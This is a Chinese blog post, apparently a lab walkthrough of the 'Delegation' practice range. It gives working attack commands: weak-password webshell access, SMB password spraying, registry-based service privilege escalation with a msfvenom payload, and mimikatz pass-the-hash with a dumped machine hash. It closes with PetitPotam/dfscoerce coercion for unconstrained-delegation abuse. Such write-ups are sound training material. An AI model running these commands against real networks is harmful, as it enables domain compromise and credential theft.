<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha256-wiz7ZSCn/btzhjKDQBms9Hx4sSeUYsDrTLg7roPstac=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.19.2","exturl":false,"sidebar":{"position":"right","width":200,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>



<link rel="canonical" href="http://example.com/2025/05/11/Delegation/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2025/05/11/Delegation/","path":"2025/05/11/Delegation/","title":"春秋云境-Delegation"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>春秋云境-Delegation | Y0ng's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Y0ng's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AD%A6%E4%B9%A0%E7%82%B9"><span class="nav-text">学习点</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#cmseasy"><span class="nav-text">cmseasy</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-text">用户密码爆破</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%8F%90%E6%9D%83"><span class="nav-text">注册表提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE-NTLM-%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81"><span class="nav-text">非约束委派+NTLM 强制认证</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E5%9F%9F%E6%8E%A7"><span class="nav-text">攻击域控</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Y0ng</p>
  <div class="site-description" itemprop="description"></div>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/05/11/Delegation/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Y0ng">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Y0ng's Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="春秋云境-Delegation | Y0ng's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          春秋云境-Delegation
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-05-11 16:30:00" itemprop="dateCreated datePublished" datetime="2025-05-11T16:30:00+08:00">2025-05-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E4%BA%91%E5%A2%83%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">云境靶场</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><!--more-->

<img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/814b1d15a97935ca508a391913f26122.png" style="zoom:67%;" />


<h1 id="学习点"><a href="#学习点" class="headerlink" title="学习点"></a>学习点</h1><ul>
<li><p>PrivescCheck：windows本地提权检查脚本 <a target="_blank" rel="noopener" href="https://github.com/itm4n/PrivescCheck">https://github.com/itm4n/PrivescCheck</a></p>
</li>
<li><p>NTLM Relay 强制认证：<a target="_blank" rel="noopener" href="https://forum.butian.net/share/1944">红队域渗透NTLM Relay：强制认证方式总结</a></p>
</li>
</ul>
<hr>
<table>
<thead>
<tr>
<th>172.22.4.36</th>
<th>loaclhost</th>
<th>外网 CmsEasy（易通 CMS）服务器</th>
</tr>
</thead>
<tbody><tr>
<td>172.22.4.45</td>
<td>WIN19.xiaorang.lab</td>
<td>配置了非约束委派的主机</td>
</tr>
<tr>
<td>172.22.4.19</td>
<td>FILESERVER.xiaorang.lab</td>
<td>文件服务器</td>
</tr>
<tr>
<td>172.22.4.7</td>
<td>DC01.xiaorang.lab</td>
<td>域控</td>
</tr>
</tbody></table>
<h1 id="cmseasy"><a href="#cmseasy" class="headerlink" title="cmseasy"></a>cmseasy</h1><p>弱口令 admin/123456 后台shell，suid提权读文件</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">diff --line-format&#x3D;%L &#x2F;dev&#x2F;null flag01.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#x2F;home&#x2F;flag&#x2F; &gt;diff --line-format&#x3D;%L &#x2F;dev&#x2F;null flag01.txt</span><br><span class="line">  ____  U _____ u  _     U _____ u   ____      _       _____             U  ___ u  _   _     </span><br><span class="line"> |  _&quot;\ \| ___&quot;|&#x2F; |&quot;|    \| ___&quot;|&#x2F;U &#x2F;&quot;___|uU  &#x2F;&quot;\  u  |_ &quot; _|     ___     \&#x2F;&quot;_ \&#x2F; | \ |&quot;|    </span><br><span class="line">&#x2F;| | | | |  _|&quot; U | | u   |  _|&quot;  \| |  _ &#x2F; \&#x2F; _ \&#x2F;     | |      |_&quot;_|    | | | |&lt;|  \| |&gt;   </span><br><span class="line">U| |_| |\| |___  \| |&#x2F;__  | |___   | |_| |  &#x2F; ___ \    &#x2F;| |\      | | .-,_| |_| |U| |\  |u   </span><br><span class="line"> |____&#x2F; u|_____|  |_____| |_____|   \____| &#x2F;_&#x2F;   \_\  u |_|U    U&#x2F;| |\u\_)-\___&#x2F;  |_| \_|    </span><br><span class="line">  |||_   &lt;&lt;   &gt;&gt;  &#x2F;&#x2F;  \\  &lt;&lt;   &gt;&gt;   _)(|_   \\    &gt;&gt;  _&#x2F;&#x2F; \\_.-,_|___|_,-.  \\    ||   \\,-. </span><br><span class="line"> (__)_) (__) (__)(_&quot;)(&quot;_)(__) (__) (__)__) (__)  (__)(__) (__)\_)-&#39; &#39;-(_&#x2F;  (__)   (_&quot;)  (_&#x2F;  </span><br><span class="line"></span><br><span class="line">flag01: flag&#123;cfb91c90-a38a-4419-a974-ad32415fccd3&#125;</span><br><span class="line"></span><br><span class="line">Great job!!!!!!</span><br><span class="line"></span><br><span class="line">Here is the hint: WIN19\Adrian</span><br><span class="line"></span><br><span class="line">I&#39;ll do whatever I can to rock you...</span><br></pre></td></tr></table></figure>

<p>fscan</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">172.22.4.45:445 open</span><br><span class="line">172.22.4.19:445 open</span><br><span class="line">172.22.4.7:445 open</span><br><span class="line">172.22.4.45:139 open</span><br><span class="line">172.22.4.7:139 open</span><br><span class="line">172.22.4.19:139 open</span><br><span class="line">172.22.4.45:135 open</span><br><span class="line">172.22.4.7:135 open</span><br><span class="line">172.22.4.19:135 open</span><br><span class="line">172.22.4.45:80 open</span><br><span class="line">172.22.4.36:80 open</span><br><span class="line">172.22.4.7:88 open</span><br><span class="line">172.22.4.36:22 open</span><br><span class="line">172.22.4.36:21 open</span><br><span class="line">172.22.4.36:3306 open</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.4.7</span><br><span class="line">   [-&gt;]DC01</span><br><span class="line">   [-&gt;]172.22.4.7</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.4.45</span><br><span class="line">   [-&gt;]WIN19</span><br><span class="line">   [-&gt;]172.22.4.45</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.4.19</span><br><span class="line">   [-&gt;]FILESERVER</span><br><span class="line">   [-&gt;]172.22.4.19</span><br><span class="line">[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393</span><br><span class="line">[*] NetBios 172.22.4.45     XIAORANG\WIN19                </span><br><span class="line">[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393</span><br><span class="line">[*] OsInfo 172.22.4.7	(Windows Server 2016 Datacenter 14393)</span><br><span class="line">[*] WebTitle http:&#x2F;&#x2F;172.22.4.36        code:200 len:0      title:None</span><br><span class="line">[*] WebTitle http:&#x2F;&#x2F;172.22.4.45        code:200 len:703    title:IIS Windows Server</span><br></pre></td></tr></table></figure>



<h1 id="用户密码爆破"><a href="#用户密码爆破" class="headerlink" title="用户密码爆破"></a>用户密码爆破</h1><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">proxychains4 -q crackmapexec smb 172.22.4.45 -u Adrian -p pass.txt --local-auth</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501182846491.png" alt="image-20250501182846491"></p>
<p>密码 <code>babygirl1</code> 但是已经过期，远程更改密码</p>
<p>使用impacket失败</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$ proxychains4 -q impacket-changepasswd WIN19&#x2F;Adrian:&#39;babygirl1&#39;@172.22.4.45 -newpass &#39;Admin@123456&#39;</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Changing the password of WIN19\Adrian</span><br><span class="line">[*] Connecting to DCE&#x2F;RPC as WIN19\Adrian</span><br><span class="line">[!] Password is expired or must be changed, trying to bind with a null session.</span><br><span class="line">[*] Connecting to DCE&#x2F;RPC as null session</span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smbconnection.py&quot;, line 280, in login</span><br><span class="line">    return self._SMBConnection.login(user, password, domain, lmhash, nthash)</span><br><span class="line">           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smb3.py&quot;, line 1091, in login</span><br><span class="line">    if packet.isValidAnswer(STATUS_SUCCESS):</span><br><span class="line">       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smb3structs.py&quot;, line 460, in isValidAnswer</span><br><span class="line">    raise smb3.SessionError(self[&#39;Status&#39;], self)</span><br><span class="line">impacket.smb3.SessionError: SMB SessionError: STATUS_PASSWORD_EXPIRED(The user account password has expired.)</span><br><span class="line"></span><br><span class="line">During handling of the above exception, another exception occurred:</span><br><span class="line"></span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 392, in connect</span><br><span class="line">    self.dce &#x3D; self.authenticate(anonymous&#x3D;False)</span><br><span class="line">               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 371, in authenticate</span><br><span class="line">    dce.connect()</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;dcerpc&#x2F;v5&#x2F;rpcrt.py&quot;, line 805, in connect</span><br><span class="line">    return self._transport.connect()</span><br><span class="line">           ^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;dcerpc&#x2F;v5&#x2F;transport.py&quot;, line 514, in connect</span><br><span class="line">    self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smbconnection.py&quot;, line 282, in login</span><br><span class="line">    raise SessionError(e.get_error_code(), e.get_error_packet())</span><br><span class="line">impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000071 - STATUS_PASSWORD_EXPIRED - The user account password has expired.</span><br><span class="line"></span><br><span class="line">During handling of the above exception, another exception occurred:</span><br><span class="line"></span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smbconnection.py&quot;, line 280, in login</span><br><span class="line">    return self._SMBConnection.login(user, password, domain, lmhash, nthash)</span><br><span class="line">           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smb3.py&quot;, line 1091, in login</span><br><span class="line">    if packet.isValidAnswer(STATUS_SUCCESS):</span><br><span class="line">       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smb3structs.py&quot;, line 460, in isValidAnswer</span><br><span class="line">    raise smb3.SessionError(self[&#39;Status&#39;], self)</span><br><span class="line">impacket.smb3.SessionError: SMB SessionError: STATUS_ACCESS_DENIED(&#123;Access Denied&#125; A process has requested access to an object but has not been granted those access rights.)</span><br><span class="line"></span><br><span class="line">During handling of the above exception, another exception occurred:</span><br><span class="line"></span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 960, in &lt;module&gt;</span><br><span class="line">    handler.changePassword(</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 225, in changePassword</span><br><span class="line">    return self._changePassword(</span><br><span class="line">           ^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 530, in _changePassword</span><br><span class="line">    if not self.connect(retry_if_expired&#x3D;True):</span><br><span class="line">           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 398, in connect</span><br><span class="line">    self.dce &#x3D; self.authenticate(anonymous&#x3D;True)</span><br><span class="line">               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;share&#x2F;doc&#x2F;python3-impacket&#x2F;examples&#x2F;changepasswd.py&quot;, line 371, in authenticate</span><br><span class="line">    dce.connect()</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;dcerpc&#x2F;v5&#x2F;rpcrt.py&quot;, line 805, in connect</span><br><span class="line">    return self._transport.connect()</span><br><span class="line">           ^^^^^^^^^^^^^^^^^^^^^^^^^</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;dcerpc&#x2F;v5&#x2F;transport.py&quot;, line 514, in connect</span><br><span class="line">    self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)</span><br><span class="line">  File &quot;&#x2F;usr&#x2F;lib&#x2F;python3&#x2F;dist-packages&#x2F;impacket&#x2F;smbconnection.py&quot;, line 282, in login</span><br><span class="line">    raise SessionError(e.get_error_code(), e.get_error_packet())</span><br><span class="line">impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - &#123;Access Denied&#125; A process has requested access to an object but has not been granted those access rights.</span><br></pre></td></tr></table></figure>

<p>使用rdp修改密码为 <code>Admin@123</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">rdesktop 172.22.4.45 -d WIN19 -u Adrian -p babygirl1 -z</span><br></pre></td></tr></table></figure>

<h1 id="注册表提权"><a href="#注册表提权" class="headerlink" title="注册表提权"></a>注册表提权</h1><p>利用提权检查脚本发现存在对 SYSTEM用户的 gupdate 服务的注册表路径有修改权限</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">powershell -ep bypass -c &quot;. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501185044977.png" alt="image-20250501185044977"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Name              : gupdate</span><br><span class="line">ImagePath         : &quot;C:\Program Files (x86)\Google\Update\GoogleUpdate.exe&quot; &#x2F;svc</span><br><span class="line">User              : LocalSystem</span><br><span class="line">ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\gupdate</span><br><span class="line">IdentityReference : NT AUTHORITY\Authenticated Users</span><br><span class="line">Permissions       : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetV</span><br><span class="line">                    alue, QueryValue</span><br><span class="line">Status            : Stopped</span><br><span class="line">UserCanStart      : True</span><br><span class="line">UserCanStop       : True</span><br><span class="line"></span><br><span class="line">Name              : gupdate</span><br><span class="line">ImagePath         : &quot;C:\Program Files (x86)\Google\Update\GoogleUpdate.exe&quot; &#x2F;svc</span><br><span class="line">User              : LocalSystem</span><br><span class="line">ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\gupdate</span><br><span class="line">IdentityReference : BUILTIN\Users</span><br><span class="line">Permissions       : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetV</span><br><span class="line">                    alue, QueryValue</span><br><span class="line">Status            : Stopped</span><br><span class="line">UserCanStart      : True</span><br><span class="line">UserCanStop       : True</span><br><span class="line"></span><br><span class="line">Name              : Spooler</span><br><span class="line">ImagePath         : C:\Windows\System32\spoolsv.exe</span><br><span class="line">User              : LocalSystem</span><br><span class="line">ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\Spooler</span><br><span class="line">IdentityReference : NT AUTHORITY\Authenticated Users</span><br><span class="line">Permissions       : ReadControl, EnumerateSubKeys, WriteOwner, CreateSubKey, QueryValue</span><br><span class="line">Status            : Running</span><br><span class="line">UserCanStart      : False</span><br><span class="line">UserCanStop       : False</span><br></pre></td></tr></table></figure>

<p>msf生成exe，去执行a.bat</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows&#x2F;x64&#x2F;exec cmd&#x3D;&#39;C:\windows\system32\cmd.exe &#x2F;c C:\Users\Public\Downloads\a.bat &#39; --platform windows -f exe-service &gt; a.exe</span><br></pre></td></tr></table></figure>

<p>a.bat</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">net localgroup administrators Adrian &#x2F;add</span><br></pre></td></tr></table></figure>

<p>修改服务程序路径</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># 修改服务程序</span><br><span class="line">reg add &quot;HKLM\SYSTEM\CurrentControlSet\Services\gupdate&quot; &#x2F;t REG_EXPAND_SZ &#x2F;v ImagePath &#x2F;d &quot;C:\Users\Public\Downloads\a.exe&quot; &#x2F;f</span><br><span class="line"># 查询</span><br><span class="line">reg query &quot;HKLM\SYSTEM\CurrentControlSet\Services\gupdate&quot; &#x2F;v ImagePath</span><br><span class="line"># 启动</span><br><span class="line">sc start gupdate</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501192154286.png" alt="image-20250501192154286"></p>
<p>flag02</p>
<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501192609130.png" alt="image-20250501192609130"></p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><p>提权后reg拿到机器密码hash，pth去做域内信息收集</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">WIN19$：aad3b435b51404eeaad3b435b51404ee:c38ca39606871db61c1389b0fbedf381</span><br></pre></td></tr></table></figure>

<p>用机器hash做PTH</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::pth &#x2F;user:WIN19$ &#x2F;domain:xiaorang.lab &#x2F;ntlm:c38ca39606871db61c1389b0fbedf381&quot; exit</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501195922825.png" alt="image-20250501195922825"></p>
<p><strong>委派信息查询</strong></p>
<p>在Win19本地使用adfind，直接查到当前机器配置了非约束委派</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">C:\Users\Public\Downloads&gt;AdFind.exe -b &quot;DC&#x3D;xiaorang,DC&#x3D;lab&quot; -f &quot;(&amp;(samAccountType&#x3D;805306369)(userAccountControl:1.2.840.113556.1.4.803:&#x3D;524288))&quot; -dn</span><br><span class="line"></span><br><span class="line">AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023</span><br><span class="line"></span><br><span class="line">Using server: DC01.xiaorang.lab:389</span><br><span class="line">Directory: Windows Server 2016</span><br><span class="line"></span><br><span class="line">dn:CN&#x3D;DC01,OU&#x3D;Domain Controllers,DC&#x3D;xiaorang,DC&#x3D;lab</span><br><span class="line">dn:CN&#x3D;WIN19,CN&#x3D;Computers,DC&#x3D;xiaorang,DC&#x3D;lab</span><br><span class="line"></span><br><span class="line">2 Objects returned</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501200244951.png" alt="image-20250501200244951"></p>
<p>远程可以用impacket</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">impacket-findDelegation xiaorang.lab&#x2F;&#39;WIN19$&#39; -hashes :c38ca39606871db61c1389b0fbedf381 -dc-ip 172.22.4.7 </span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501200515429.png" alt="image-20250501200515429"></p>
<p>远程还可以用adinfo</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Adinfo_win.exe -d xiaorang.lab --dc 172.22.4.7 -u WIN19$ -H c38ca39606871db61c1389b0fbedf381 --checkbackdoor</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501201351595.png" alt="image-20250501201351595"></p>
<blockquote>
<p>在win上能正常走代理，在linux下貌似有bug，拒绝访问</p>
</blockquote>
<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501201504490.png" alt="image-20250501201504490"></p>
<p>所以下面只需要强制触发域控认证即可！</p>
<h1 id="非约束委派-NTLM-强制认证"><a href="#非约束委派-NTLM-强制认证" class="headerlink" title="非约束委派+NTLM 强制认证"></a>非约束委派+NTLM 强制认证</h1><p>使用 Printerbug、PetitPotam 、dfscoerce等强制域控进行认证</p>
<blockquote>
<p>PetitPotam 在2008、2012低版本环境下可匿名触发：匿名访问的命名管道中有三个netlogon、samr、lsarpc</p>
<p>impacket-PetitPotam WIN7.test.com 192.168.100.128</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">proxychains4 -q impacket-PetitPotam -u &#39;WIN19$&#39; -hashes :c38ca39.. -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab 172.22.4.7</span><br><span class="line"></span><br><span class="line">proxychains4 -q impacket-dfscoerce -u &#39;WIN19$&#39; -hashes :c38ca39.. -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab 172.22.4.7</span><br></pre></td></tr></table></figure>

